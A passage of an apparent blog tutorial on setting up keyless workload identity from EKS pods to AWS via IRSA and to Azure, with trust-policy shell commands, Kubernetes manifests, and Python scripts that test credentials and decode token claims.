            &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
            &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api://AzureADTokenExchange&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-token&lt;/span&gt;
            &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;//iam.googleapis.com/projects/PROJECT_NUMBER/...&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Approach 2: Shared Token (Acceptable for Testing/Demos)
&lt;/h4&gt;

&lt;p&gt;Reuse a single token with one audience for multiple clouds:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Demos, or environments where managing several projected tokens is impractical&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Limitations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;⚠️ Violates AWS best practices when using Azure audience&lt;/li&gt;
&lt;li&gt;⚠️ Less clear in audit logs&lt;/li&gt;
&lt;li&gt;⚠️ Potential security concerns in highly regulated environments&lt;/li&gt;
&lt;li&gt;⚠️ May not work in all scenarios (some clouds reject non-standard audiences)&lt;/li&gt;
&lt;/ul&gt;
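&lt;p&gt;If you do take this shortcut in a demo, the pod spec shrinks to a single projected volume; every cloud must then be configured to trust that one audience (shown here reusing the Azure audience, purely as an illustration):&lt;/p&gt;

```yaml
# A single projected token reused for every cloud (demo only).
# All providers must be configured to accept this one audience.
volumes:
  - name: shared-token
    projected:
      sources:
        - serviceAccountToken:
            path: shared-token
            audience: api://AzureADTokenExchange  # reused for AWS and GCP too
```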

&lt;p&gt;&lt;strong&gt;This guide uses Approach 1 (dedicated tokens) for all cross-cloud scenarios to demonstrate production-ready patterns.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Scenario 1: Pods Running in EKS
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; After completing this scenario, make sure to clean up the resources using the cleanup steps at the end of this section before proceeding to the next scenario to avoid resource conflicts and unnecessary costs.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Architecture Overview
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl6qs7yb67e04erov49jr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl6qs7yb67e04erov49jr.png" alt="eks" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 Authenticating to AWS (Native IRSA)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Create IAM OIDC provider (if not exists), in our case eks cluster was created with OIDC provider; hence no need&lt;/span&gt;

&lt;span class="c"&gt;# 2. Get OIDC provider URL&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws eks describe-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-eks-cluster &lt;span class="nt"&gt;--region&lt;/span&gt; us-east-1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"cluster.identity.oidc.issuer"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; text | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"s/^https:&lt;/span&gt;&lt;span class="se"&gt;\/\/&lt;/span&gt;&lt;span class="s2"&gt;//"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create IAM role trust policy&lt;/span&gt;
&lt;span class="nv"&gt;YOUR_ACCOUNT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws sts get-caller-identity &lt;span class="nt"&gt;--query&lt;/span&gt; Account &lt;span class="nt"&gt;--output&lt;/span&gt; text&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; trust-policy.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;YOUR_ACCOUNT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:oidc-provider/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:sub": "system:serviceaccount:default:eks-cross-cloud-sa",
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# 4. Create IAM role&lt;/span&gt;
aws iam create-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; eks-cross-cloud-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assume-role-policy-document&lt;/span&gt; file://trust-policy.json

&lt;span class="c"&gt;# 5. Attach permissions policy&lt;/span&gt;
aws iam attach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; eks-cross-cloud-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
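&lt;p&gt;A mismatched &lt;code&gt;sub&lt;/code&gt; or &lt;code&gt;aud&lt;/code&gt; condition is the most common cause of &lt;code&gt;AssumeRoleWithWebIdentity&lt;/code&gt; failures, so it is worth sanity-checking the generated &lt;code&gt;trust-policy.json&lt;/code&gt; before creating the role. The checker below is a minimal sketch that matches the names used in the commands above:&lt;/p&gt;

```python
# Validate an IRSA trust policy dict: the StringEquals conditions must
# pin the exact service account subject and the sts.amazonaws.com audience.
import json

def check_trust_policy(policy, oidc_provider, namespace, sa_name):
    """Return a list of problems found in an IRSA trust policy dict."""
    for stmt in policy.get("Statement", []):
        if stmt.get("Action") != "sts:AssumeRoleWithWebIdentity":
            continue
        problems = []
        cond = stmt.get("Condition", {}).get("StringEquals", {})
        expected_sub = "system:serviceaccount:{}:{}".format(namespace, sa_name)
        if cond.get(oidc_provider + ":sub") != expected_sub:
            problems.append("sub condition does not match " + expected_sub)
        if cond.get(oidc_provider + ":aud") != "sts.amazonaws.com":
            problems.append("aud condition is not sts.amazonaws.com")
        return problems
    return ["no AssumeRoleWithWebIdentity statement found"]

# Usage, after generating the file with the commands above:
#   policy = json.load(open("trust-policy.json"))
#   print(check_trust_policy(policy, OIDC_PROVIDER, "default", "eks-cross-cloud-sa") or "OK")
```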



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Apply the manifest below to validate Scenario 1.1. If authentication is working, you will see success logs as shown below.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario1-1-eks-to-aws.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;eks.amazonaws.com/role-arn&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;arn:aws:iam::YOUR_AWS_ACCOUNT_ID:role/eks-cross-cloud-role&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-aws-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;restartPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Never&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir boto3 &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_aws_from_eks.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_REGION&lt;/span&gt;
        &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-east-1&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
        &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_aws_from_eks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_aws_from_eks.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test AWS S3 access using IRSA&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# SDK automatically uses IRSA credentials
&lt;/span&gt;        &lt;span class="n"&gt;s3_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List buckets to verify access
&lt;/span&gt;        &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s3_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;AWS Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; S3 buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;][:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Name&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Get caller identity
&lt;/span&gt;        &lt;span class="n"&gt;sts_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;sts&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;identity&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sts_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_caller_identity&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Authenticated as: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;identity&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Arn&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;AWS Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success Logs&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If &lt;code&gt;kubectl logs -f -n default eks-aws-test&lt;/code&gt; shows output like the following, the EKS-to-AWS authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;AWS Authentication successful!
Found &amp;lt;number of buckets&amp;gt; S3 buckets:
  - bucket-1
  - bucket-2
  - ...

Authenticated as: arn:aws:sts::YOUR_AWS_ACCOUNT_ID:assumed-role/eks-cross-cloud-role/botocore-session-&amp;lt;some random number&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
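&lt;p&gt;Under the hood, this success path depends on the EKS Pod Identity Webhook injecting &lt;code&gt;AWS_ROLE_ARN&lt;/code&gt; and &lt;code&gt;AWS_WEB_IDENTITY_TOKEN_FILE&lt;/code&gt; into the pod; boto3's default credential chain sees both variables and calls &lt;code&gt;sts:AssumeRoleWithWebIdentity&lt;/code&gt; for you. A minimal sketch of that discovery step (&lt;code&gt;resolve_web_identity&lt;/code&gt; and the account number are illustrative helpers, not boto3 internals):&lt;/p&gt;

```python
# Sketch: how an SDK-style credential chain discovers the web-identity
# settings injected by the EKS Pod Identity Webhook (IRSA).
# resolve_web_identity() is a hypothetical helper for illustration only;
# boto3 performs this lookup internally when both variables are present.

def resolve_web_identity(environ):
    """Return (role_arn, token_file) if the IRSA env vars are set, else None."""
    role_arn = environ.get("AWS_ROLE_ARN")
    token_file = environ.get("AWS_WEB_IDENTITY_TOKEN_FILE")
    if role_arn and token_file:
        return role_arn, token_file
    return None

# Example values as the webhook would inject them (account ID is a placeholder).
env = {
    "AWS_ROLE_ARN": "arn:aws:iam::111122223333:role/eks-cross-cloud-role",
    "AWS_WEB_IDENTITY_TOKEN_FILE": "/var/run/secrets/eks.amazonaws.com/serviceaccount/token",
}
print(resolve_web_identity(env))
print(resolve_web_identity({}))  # no IRSA env vars -> falls through the chain
```

&lt;p&gt;If authentication fails, checking that both variables actually appear in &lt;code&gt;kubectl exec ... -- env&lt;/code&gt; is usually the fastest first step.&lt;/p&gt;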



&lt;h3&gt;
  
  
  1.2 Authenticating to Azure from EKS
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Cross-Cloud Authentication Flow:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgeusm2iei2jdv37im84r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgeusm2iei2jdv37im84r.png" alt="eks to azure" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; We use &lt;code&gt;api://AzureADTokenExchange&lt;/code&gt; as the audience so the same projected token can be reused across Azure and AWS. In an Azure-only production setup this is still the right choice: it is the standard audience for Azure Workload Identity.&lt;/p&gt;
&lt;/blockquote&gt;
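&lt;p&gt;If the token exchange fails with an audience error, it helps to decode the projected token's payload and inspect the &lt;code&gt;aud&lt;/code&gt; claim directly; a JWT payload is just base64url-encoded JSON. A self-contained sketch (the token here is synthetic, built in-line; in the cluster you would read the projected token file instead):&lt;/p&gt;

```python
# Decode a JWT payload without verifying the signature, purely to inspect claims.
# The token below is synthetic, assembled in-line for illustration.
import base64
import json

def jwt_claims(token):
    """Return the claims dict from a JWT's payload segment."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))

claims = {"sub": "system:serviceaccount:default:eks-cross-cloud-sa",
          "aud": ["api://AzureADTokenExchange"]}
body = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode().rstrip("=")
token = f"eyJhbGciOiJSUzI1NiJ9.{body}.signature"

print(jwt_claims(token)["aud"])  # → ['api://AzureADTokenExchange']
```

&lt;p&gt;The same trick works on a real projected token copied out of the pod, since only the payload segment is being decoded.&lt;/p&gt;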

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Make sure you have done  `az login` and set the subscription you want to work in before proceeding with next steps&lt;/span&gt;

&lt;span class="c"&gt;# 1. Get EKS OIDC issuer URL&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws eks describe-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-eks-cluster &lt;span class="nt"&gt;--region&lt;/span&gt; us-east-1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"cluster.identity.oidc.issuer"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; text&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create Azure AD application&lt;/span&gt;
